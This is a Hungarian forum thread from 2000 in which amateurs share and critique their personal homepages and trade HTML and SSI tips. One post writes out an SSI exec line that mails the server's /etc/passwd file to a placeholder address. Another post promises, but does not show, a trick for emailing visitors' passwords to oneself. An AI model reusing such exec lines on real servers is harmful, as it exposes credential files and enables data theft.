Keresés

Részletes keresés

Herold Creative Commons License 2000.02.28 0 0 30
A design és a tartalom tekintetében véleményezzétek ezt az oldalt.
Laslow Creative Commons License 2000.02.27 0 0 29
Hali all! Van ám honlapom, tessék megvéleményezni,
annak ellenére is, hogy hmm.. magam is belátom, hogy van
még mit alakítani rajta.
http://www.extra.hu/laslow
Bye all,
Laslow
nyman Creative Commons License 2000.02.27 0 0 28
Ht nemtom ennekem a tobbi is nagyon gagyin jon :(
Előzmény: CooCooFoo2ooo (27)
CooCooFoo2ooo Creative Commons License 2000.02.27 0 0 27
Azért lehet, mert még nincs neked feltéve a Flash plugin a böngésződhöz, valószínűleg azt tölti épp -- vagy azon töri a fejét. :-))

Az extra egyébként is elég lassú gyermek tud lenni bizonyos helyekről. Ajánlanám az emil.alarmix.org-ot freehelyként, én mostanában akarok költözni (csak egyszer érjek már rá).

Előzmény: nyman (26)
nyman Creative Commons License 2000.02.27 0 0 26
OFF
mar megartam kerdezni, hogy ezek a magyar sajtok (nexus swi extra) normalisan jonnek?? mert nekem a halalom :(( nemtom a savszelesseg szar kulfoldre, vagy a reklamok miatt nem elvezek prioritast

CCFZ oldalat mar husz perce proszalom letolteni, de csak forog a foldgomb es semmi :(( A tobbiekkel sem nagyon jarok sikerrel.
ON

CooCooFoo2ooo Creative Commons License 2000.02.27 0 0 25
Nekem egy rendes ember megmondta egyszer a frankót az összes weboldalammal kapcsolatban. Az pedig annyi volt, hogy hiába irkálja profin az ember a HTML-t, hiába nyaggatja a Flash-et, ha egyszer nem dizájner és grafikailag nem ért hozzá. Mert az is egy szakma, ugye... Én azóta másképp próbálok a dologra tekinteni, bár változó sikerrel. Ez még most alakul át, csak részben működik erről meg lefelejtettem a zenét...
rayn Creative Commons License 2000.02.27 0 0 24
www.nexus.hu/rayn (idokozben vendegkonyv kampec)


www.extra.hu/boldivi (majd rendbehozom talan)


w3.swi.hu/eplanet (itt gyakoroltam a PERL tudasomat)
vébé Creative Commons License 2000.02.27 0 0 23
Folytköv:

Exec
Az exec hatására egy parancs vagy egy meghívott CGI script hajtódik végre. A shell parancsot a Bourne shell (/bin/sh) hajtja végre. Így ez a parancs lehet hihetetlenül egyszerű, mint pl. a könyvtár tartalmának megjelenítése, de ennél sokkal bonyolultabb parancsok is lehetnek a html- be ágyazva. Összefűzött parancsokkal vmilyen dokumentum például szövegelemzés hajtható végre, de az eredmény aztán a dokumentum részévé válik.
A parancs végrehajtásával HTML dokumentumba beilleszthető, hogy vajon egy tetszőleges user éppen be van-e jelentkezve a gépre.

< !--#exec cmd="/cgi-bin/finger felhasználó" > (space-t semelyik csúcsos zárójel után ne rakjatok, én csak a gép miatt rakok)

A következőket is be lehet írni HTML dokumentumba:

< !--#exec cmd="mail valaki@valahol /etc/passwd stb.,"-- >

nyman Creative Commons License 2000.02.27 0 0 22
Arra esetleg van tipped, hogy hogyan lehet egyidoben minnel tobb keresobe beindexelni? Eddig meg csak fizetosoket lattam.
Előzmény: Újlaki (21)
Újlaki Creative Commons License 2000.02.27 0 0 21
A kedves apukáknak és anyukáknak, akarom mondani a büszke honlap-tulajdonosoknak mondanám, hogy a látogató nélküli honlap az olyan, mint amikor valaki magában beszél, vagy mint az író, aki az íróasztal-fióknak ír. Mondhatnám úgy is, a kéménybe korommal. Esetleg a partner nélküli szexuális aktushoz hasonlíthatnám még. Jó, persze, de azért az sem baj, ha valaki velünk együtt élvezi. A honlap látványára gondolok, természetesen.

Szóval ha kész a honlap, az nem a vége, hanem a kedzete valaminek. Eddig volt a szórakozás, most ki kell hordani a magzatot.

Éppen ezért, amikor készen vagy a lapoddal, akkor tessék lejelenteni a keresőprogramoknak. El sem hiszed, hogy ha ügyes vagy, mennyi látogatót tudsz magadhoz csábítani. Vanna a neten speciális szolgáltatások, amelyek több tucatnyi vagy akár több száz keresőnek is lejelentik a lapot egyszerre. Ha mindenünnen csak egyetlen egy látogató...

Tapasztalatom szerint nálunk a toplisták nem nagyon alkalmasak látogatók csábítására. Ha mégis, legfeljebb az első néhány helyezett számíthat onnan látogatóra. Azért feliratkozhatsz a létező kevés listára, legalább tudod, hányadán állsz.

Aztán keress hasonló érdeklődési körű lapokat, és cserélj linket. A linkeket ne tedd külön lapra, akkor a látogatók 2-3 százaléka fogja ezeket megnézni, és annak a kevésnek is csak a töredéke megy tovább; tedd a linket főlapra, ha azt akarod, hogy lássa is valaki.

Ha úgy érzed, hogy jelentőset alkottál, ami nem csak egy-két embert érdekel, próbáld felvétetni a portálok listáiba. Nem feltétlenül a főoldalt: a tematikus oldalaidat külön is belinkeltetheted.

Aztán jöhetnek a nyilvános linkcsere-programok. Ezek egyrészt kevésbé hatékonyak, mint a tematikus linkek, mert véletlenszerűen szólítják meg a látogatót, de más szempontból mégis hatékonyabbak, mert olyan területeken szórja a lapotok magját, ahova az különben nem nagyon jutna el.

(folyt. köv.)

nyman Creative Commons License 2000.02.27 0 0 20
Ja ez a kek alapkoncepcio. Meg a zold alapon sarga fejlec is :)
Előzmény: vébé (16)
vébé Creative Commons License 2000.02.27 0 0 19
Na és ez hogy tetszik?:))
vébé Creative Commons License 2000.02.27 0 0 18
Persze space-t ne rakjatok, csak azért raktam én, hogy lássátok, mert amikor cybergregnek írtam, ezel nem számoltam.
vébé Creative Commons License 2000.02.27 0 0 17
< HTML >
< HEAD >
< META http-equiv="refresh" content="hány másodpercet várjon ezen a lapon; URL="ahova akarod, hogy menjen a várás után" >
< /HEAD >
< BODY >
< /BODY >
< /HTML >

Bocs az előbbiért, csak a net komolyan vette, amit írtam... for cybergreg

vébé Creative Commons License 2000.02.27 0 0 16
Megnéztem pár honlapot ezek közül, és vannak üzeneteim.
cybergreg:
Jó a honlap, csak a kezdésnél, ha nem akarod, hogy a folytatáshoz vki kattanjon a képre, vagy a linkre, akkor írd be ezt txt-ben az index.html-re:



Na, ez olyan lesz, mint itt az Indexnél, hogy vár egy kicsit, és megy egy másik lapra anélkül, hogy bármit is csiálnál. Ha content=0, akkor rögtön arra az URL-re megy. a guestbok-kal is kéne csinálni vmit...
nyman
Nagyon színvonalas, csak a kinézetén kéne vmit berhelni... (kék háttér)
matiz:
Egyáltalán nem gagyi site.

nyman Creative Commons License 2000.02.27 0 0 15
Előzmény: Törölt nick (14)
Törölt nick Creative Commons License 2000.02.27 0 0 14
Gagyi honlapokkal hova kell jelentkezni?
nyman Creative Commons License 2000.02.27 0 0 13
Csekk Creative Commons License 2000.02.26 0 0 12
Sziasztok!
Ha már extrákról van szó akkor legyen itt egy fullextra is.
Itt pedig egy fullextra pályázat!
Lehet felkötni, ha van mit, és mered is! :)
Választ ne csak ide írj, mert itt csak ritkán vagyok, hanem az ottani fórumra is kérek.
Na meg itt is van egy:)))))Beauty

Üdv:
Csekk

cyber.greg Creative Commons License 2000.02.26 0 0 11
videohoz annyit, hogy jó a lap, csak egy kis hejesírás nem ártana pl. "IRC-el", "Gates-el". (Hogy is képezzük a -val/-vel toldalékot speciális esetekben? :-)))

Na, jönnek az én honlapjaim:

www.mibolleszacserebogar.ini.hu
itt van egy internetidő-táblázat, sajnos nem végig, mert lusta voltam.

akkor egy személyes honlap
www.greg.ini.hu
nos, ez első ránézésre elég lámernek tűnik. Sajnos, másodikra is :-(((
A vendégköny elromlott satöbbi.

ja meg még egy
www.extra.hu/troli itt csak egy link van a trolis topikhoz.

raba Creative Commons License 2000.02.26 0 0 10
www.tar.hu/mokuskerek
vébé Creative Commons License 2000.02.26 0 0 8
Figyi, ez lehet, hogy érdekel titeket. Egy könyvben olvastam, onnan idézem, miket lehet ssi kiterjesztésben csinálni
echo
A környezeti változókat legegyszerűbben egy echo paranccsal tehetjük HTML dokumentum részévé:
#echo var=KORNYEZETI_VALTOZO>

Melyek ezek a pótlólagos környezeti változók?

DOCUMENT_NAME
A fájl neve, amit nézünk.
DOCUMENT URI

A dokumenthez vezető út a Web-szerver dokumentumok könyvtárszerkezetének főágából kiindulva:
Ha a felhasználó könyvtárában lévő fájlróé van szó, ~user/út/út/fájl.htm a formátum. Az út/út/út/fájl.htm forma pedig a HTML dok.könyvtár főágából kiindulva jelöli ki a fájl nevét.

DATE_LOCAL
Helyi idő
DATE_GMT
Greenwich Mean Time
LAST_MODIFIED
A dokumentum uccsó módosításának másodpercre pontos időpontja

Van még olyan exec-parancs, amikor a látogató adatait, passwordjét elküldi a Te EMAIL címedre, majd később azt is megírom.

vébé Creative Commons License 2000.02.26 0 0 7
Hát írtál egy olyan linket, hogy "elmélkedés a vízről". Vagy nem? Én láttam...
Herold Creative Commons License 2000.02.24 0 0 6
http://www.extra.hu/surfmoney-ajandek
vébé Creative Commons License 2000.02.24 0 0 4
Elmélkedés a vízről?????
vébé Creative Commons License 2000.02.24 0 0 2
Bocs, hu-t akartam irni. vadi.ini.hu
alexandrosz Creative Commons License 2000.02.24 0 0 1
Remélem, mielőtt tanácskoztok, a vadi.ini.hi-ből vadi.ini.hu lesz.... Csak hogy kötözködhessek egy kicsit...
:o))
Előzmény: vébé (-)
Pacemaker Creative Commons License 2000.02.24 0 0 0
Nekem absz0lut semmi tapasztalat0m ezen a téren.
vébé Creative Commons License 2000.02.24 0 0 topiknyitó
Sziasztok! Ebben a topicban a honlap szerkesztéséről lesz szó, megdumáljuk az extra dolgokat. Ha megmondjátok a honlapotok URL-jét, akkor megnézhetjük, megmondjuk, hogy mit kéne még felrakni, mit kéne levenni, vagy milyen extra dolgokat lehet csinálni txt-ben.
Kezdetnek itt az én honlapom:

http://vadi.ini.hi

Ha kedveled azért, ha nem azért nyomj egy lájkot a Fórumért!